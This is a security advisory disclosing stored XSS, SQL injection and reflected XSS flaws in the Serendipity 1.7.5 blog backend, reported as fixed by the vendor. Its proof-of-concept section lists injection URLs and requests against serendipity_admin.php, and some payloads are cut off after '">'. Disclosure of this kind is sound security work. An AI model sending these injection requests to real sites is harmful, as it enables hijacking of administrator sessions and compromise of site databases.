Advisory: Serendipity 1.7.5 - Multiple security vulnerabilities
Advisory ID: SSCHADV2014-003
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.7.5
Vendor URL: http://www.s9y.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities
==========================
PoC-Exploit
==========================
// Stored-XSS with "Real name"
(1) Login as "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to ">
The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)
// SQL-Injection - with "serendipity[install_plugin]"
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]
// Reflected XSS_1 - "serendipity[install_plugin]"
http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b%2f%2f912
// Reflected XSS_2 - "serendipity[id]"
POST http://[target]/serendipity/serendipity_admin.php?
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=">